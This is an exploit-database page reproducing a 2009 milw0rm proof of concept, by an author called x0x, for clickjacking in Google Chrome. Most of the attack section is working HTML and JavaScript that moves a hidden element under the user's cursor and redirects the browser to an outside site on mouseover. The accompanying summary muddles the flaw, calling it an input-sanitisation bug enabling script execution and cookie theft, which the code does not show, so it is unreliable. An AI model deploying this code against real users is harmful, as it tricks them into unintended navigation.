header-logo
Suggest Exploit
vendor:
Chrome Web Browser
by:
x0x
7.5
CVSS
HIGH
Clickjacking
N/A
CWE
Product Name: Chrome Web Browser
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Google Chrome Web Browser Clickjacking

x0x has discovered a clickjacking vulnerability in Google Chrome Web Browser. The vulnerability is caused due to the application not properly sanitizing user-supplied input. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site by e.g. tricking a user into clicking on a specially crafted link. This can be used to e.g. steal cookie-based authentication credentials.

Mitigation:

N/A
Source

Exploit-DB raw data:

#############################################################
# Application Name   : Google Chrome Web Browser
# Vulnerable Type    : Clickjacking
# Home                   : www.ozkanbozkurt.com
# Author                 : x0x
#############################################################
< ------------------- header data end of ------------------- >

<html>
<style type="text/css">
<!--
.style1 {
 font-size: 50px;
 font-weight: bold;
}
.style2 {
 color: #FF0000;
 font-weight: bold;
 font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/BARCOD3';">This</div>
<p><strong>
  <script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
 
 
 
Greetz : All CW Users | All Muslims and Only Brother me Septemb0x

# milw0rm.com [2009-01-28]

Navigation

Suggest Exploit

Services By CQR